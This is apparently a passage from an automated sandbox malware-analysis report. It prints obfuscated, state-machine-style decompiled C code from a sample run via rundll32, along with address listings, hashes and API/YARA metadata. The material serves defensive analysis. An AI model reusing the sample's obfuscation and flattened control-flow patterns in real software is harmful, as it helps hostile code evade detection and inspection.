				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E007A0AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E007980E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E007A8519(_v360, _v348, _v292);
								E007A8519(_v352, _v388, _t422);
								E007A8519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00794B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E007AF435( &_v292,  &_v284);
								} else {
									_t359 = E007AA666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x7b3e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x7b3e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x7b3e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E007A8519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x7b3e08; // 0x0
							_t338 =  *0x7b3e08; // 0x0
							_t343 =  *0x7b3e08; // 0x0
							_t345 = E007AE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E00795548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E0079CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                          0x007964ec
                                                                                                                          0x007964f3
                                                                                                                          0x007964f5
                                                                                                                          0x007964fc
                                                                                                                          0x00796503
                                                                                                                          0x0079650a
                                                                                                                          0x00796511
                                                                                                                          0x00796518
                                                                                                                          0x00796519
                                                                                                                          0x0079651a
                                                                                                                          0x0079651f
                                                                                                                          0x00796527
                                                                                                                          0x0079652a
                                                                                                                          0x00796537
                                                                                                                          0x0079653f
                                                                                                                          0x00796541
                                                                                                                          0x00796549
                                                                                                                          0x0079654e
                                                                                                                          0x00796556
                                                                                                                          0x0079655e
                                                                                                                          0x00796566
                                                                                                                          0x00796574
                                                                                                                          0x00796579
                                                                                                                          0x0079657f
                                                                                                                          0x00796587
                                                                                                                          0x00796592
                                                                                                                          0x0079659a
                                                                                                                          0x007965a5
                                                                                                                          0x007965b2
                                                                                                                          0x007965b5
                                                                                                                          0x007965b9
                                                                                                                          0x007965c1
                                                                                                                          0x007965c9
                                                                                                                          0x007965d1
                                                                                                                          0x007965d9
                                                                                                                          0x007965e1
                                                                                                                          0x007965e6
                                                                                                                          0x007965ee
                                                                                                                          0x007965f6
                                                                                                                          0x007965fe
                                                                                                                          0x00796606
                                                                                                                          0x0079660e
                                                                                                                          0x00796616
                                                                                                                          0x0079661e
                                                                                                                          0x00796626
                                                                                                                          0x00796636
                                                                                                                          0x0079663a
                                                                                                                          0x00796642
                                                                                                                          0x0079664a
                                                                                                                          0x00796652
                                                                                                                          0x0079665a
                                                                                                                          0x00796662
                                                                                                                          0x00796674
                                                                                                                          0x00796677
                                                                                                                          0x0079667b
                                                                                                                          0x00796683
                                                                                                                          0x0079668b
                                                                                                                          0x00796690
                                                                                                                          0x00796698
                                                                                                                          0x007966a0
                                                                                                                          0x007966a8
                                                                                                                          0x007966b0
                                                                                                                          0x007966b8
                                                                                                                          0x007966c0
                                                                                                                          0x007966c8
                                                                                                                          0x007966d2
                                                                                                                          0x007966da
                                                                                                                          0x007966e2
                                                                                                                          0x007966ea
                                                                                                                          0x007966ef
                                                                                                                          0x007966f4
                                                                                                                          0x007966fc
                                                                                                                          0x00796704
                                                                                                                          0x00796712
                                                                                                                          0x00796717
                                                                                                                          0x0079671d
                                                                                                                          0x00796722
                                                                                                                          0x0079672a
                                                                                                                          0x00796732
                                                                                                                          0x0079673a
                                                                                                                          0x00796742
                                                                                                                          0x0079674a
                                                                                                                          0x00796757
                                                                                                                          0x0079675a
                                                                                                                          0x0079675e
                                                                                                                          0x00796766
                                                                                                                          0x0079676e
                                                                                                                          0x00796776
                                                                                                                          0x00796783
                                                                                                                          0x00796787
                                                                                                                          0x0079678f
                                                                                                                          0x00796797
                                                                                                                          0x0079679f
                                                                                                                          0x007967a7
                                                                                                                          0x007967af
                                                                                                                          0x007967b7
                                                                                                                          0x007967bf
                                                                                                                          0x007967c7
                                                                                                                          0x007967cf
                                                                                                                          0x007967d7
                                                                                                                          0x007967df
                                                                                                                          0x007967e7
                                                                                                                          0x007967ef
                                                                                                                          0x007967f7
                                                                                                                          0x007967ff
                                                                                                                          0x00796804
                                                                                                                          0x0079680c
                                                                                                                          0x00796814
                                                                                                                          0x0079681c
                                                                                                                          0x00796824
                                                                                                                          0x00796829
                                                                                                                          0x00796831
                                                                                                                          0x00796839
                                                                                                                          0x00796841
                                                                                                                          0x00796846
                                                                                                                          0x0079684e
                                                                                                                          0x00796856
                                                                                                                          0x0079685e
                                                                                                                          0x00796863
                                                                                                                          0x0079686b
                                                                                                                          0x00796873
                                                                                                                          0x0079687d
                                                                                                                          0x00796881
                                                                                                                          0x00796889
                                                                                                                          0x00796899
                                                                                                                          0x007968a1
                                                                                                                          0x007968a6
                                                                                                                          0x007968b0
                                                                                                                          0x007968b3
                                                                                                                          0x007968b7
                                                                                                                          0x007968bb
                                                                                                                          0x007968c3
                                                                                                                          0x007968c7
                                                                                                                          0x007968d2
                                                                                                                          0x007968dd
                                                                                                                          0x007968e8
                                                                                                                          0x007968f5
                                                                                                                          0x007968f9
                                                                                                                          0x00796901
                                                                                                                          0x00796909
                                                                                                                          0x0079690e
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691b
                                                                                                                          0x0079691d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796923
                                                                                                                          0x00796a56
                                                                                                                          0x00796a5b
                                                                                                                          0x00796a6d
                                                                                                                          0x00796a72
                                                                                                                          0x00796a73
                                                                                                                          0x00796a75
                                                                                                                          0x00796a7a
                                                                                                                          0x00796a7d
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079692f
                                                                                                                          0x00796a16
                                                                                                                          0x00796a25
                                                                                                                          0x00796a3d
                                                                                                                          0x00796a43
                                                                                                                          0x00796bc8
                                                                                                                          0x00796bc8
                                                                                                                          0x00000000
                                                                                                                          0x00796bc8
                                                                                                                          0x0079693b
                                                                                                                          0x007969d8
                                                                                                                          0x007969da
                                                                                                                          0x007969df
                                                                                                                          0x007969e6
                                                                                                                          0x007969ed
                                                                                                                          0x007969f4
                                                                                                                          0x007969fd
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796947
                                                                                                                          0x00796999
                                                                                                                          0x007969a9
                                                                                                                          0x0079699b
                                                                                                                          0x0079699b
                                                                                                                          0x0079699b
                                                                                                                          0x007969ae
                                                                                                                          0x007969b7
                                                                                                                          0x007969bc
                                                                                                                          0x00000000
                                                                                                                          0x007969bc
                                                                                                                          0x0079694f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796955
                                                                                                                          0x0079695e
                                                                                                                          0x00796960
                                                                                                                          0x00796963
                                                                                                                          0x00796966
                                                                                                                          0x0079696b
                                                                                                                          0x00796970
                                                                                                                          0x00796970
                                                                                                                          0x00796973
                                                                                                                          0x0079697a
                                                                                                                          0x00796bdb
                                                                                                                          0x00796be1
                                                                                                                          0x00796be8
                                                                                                                          0x00796bf1
                                                                                                                          0x00796980
                                                                                                                          0x00796980
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x0079697a
                                                                                                                          0x00796a8d
                                                                                                                          0x00796bbd
                                                                                                                          0x00796bc3
                                                                                                                          0x00000000
                                                                                                                          0x00796bc3
                                                                                                                          0x00796a99
                                                                                                                          0x00796b34
                                                                                                                          0x00796b4c
                                                                                                                          0x00796b7d
                                                                                                                          0x00796b89
                                                                                                                          0x00796b8e
                                                                                                                          0x00796b93
                                                                                                                          0x00796b9f
                                                                                                                          0x00796ba4
                                                                                                                          0x00796b95
                                                                                                                          0x00796b95
                                                                                                                          0x00796b95
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796aa5
                                                                                                                          0x00796b0f
                                                                                                                          0x00796b14
                                                                                                                          0x00796b19
                                                                                                                          0x00796b25
                                                                                                                          0x00796b1b
                                                                                                                          0x00796b1d
                                                                                                                          0x00796b22
                                                                                                                          0x00796b22
                                                                                                                          0x00796b2a
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00000000
                                                                                                                          0x00796916
                                                                                                                          0x00796916
                                                                                                                          0x00796aad
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796ad6
                                                                                                                          0x00796adb
                                                                                                                          0x00796ae0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00796ae6
                                                                                                                          0x00000000
                                                                                                                          0x00796bcd
                                                                                                                          0x00796bcd
                                                                                                                          0x00000000
                                                                                                                          0x00796bd9

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                          • API String ID: 0-2895984816
                                                                                                                          • Opcode ID: 670f386907e521f46632b6352961800ae520407cddd891b37e489be2328f419a
                                                                                                                          • Instruction ID: ffb5f3c4066524702eb462ae70ec2aec88d159ce8fe40c6bdf405e0c0fc9ebca
                                                                                                                          • Opcode Fuzzy Hash: 670f386907e521f46632b6352961800ae520407cddd891b37e489be2328f419a
                                                                                                                          • Instruction Fuzzy Hash: 1D0245B1508380DFC7A4CF65D589A5BBBE1FBC4358F208A0DF59A86260D7B8D949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                          • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                          • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                          • CharUpperA.USER32 ref: 10021943
                                                                                                                          • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3249967234-0
                                                                                                                          • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                          • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                          • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                          • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00795E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00795E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x7b3dfc; // 0x0
						_t374 = E0079CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E00797FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x7b3dfc; // 0x0
									_t384 = E0079CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E007A8519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                          0x00795e67
                                                                                                                          0x00795e71
                                                                                                                          0x00795e72
                                                                                                                          0x00795e79
                                                                                                                          0x00795e7b
                                                                                                                          0x00795e7c
                                                                                                                          0x00795e7d
                                                                                                                          0x00795e82
                                                                                                                          0x00795e8d
                                                                                                                          0x00795e90
                                                                                                                          0x00795e94
                                                                                                                          0x00795e9b
                                                                                                                          0x00795ea0
                                                                                                                          0x00795ea8
                                                                                                                          0x00795eb6
                                                                                                                          0x00795ebb
                                                                                                                          0x00795ec5
                                                                                                                          0x00795eca
                                                                                                                          0x00795ed0
                                                                                                                          0x00795ed8
                                                                                                                          0x00795ee0
                                                                                                                          0x00795ee5
                                                                                                                          0x00795eea
                                                                                                                          0x00795ef2
                                                                                                                          0x00795efd
                                                                                                                          0x00795f08
                                                                                                                          0x00795f13
                                                                                                                          0x00795f1b
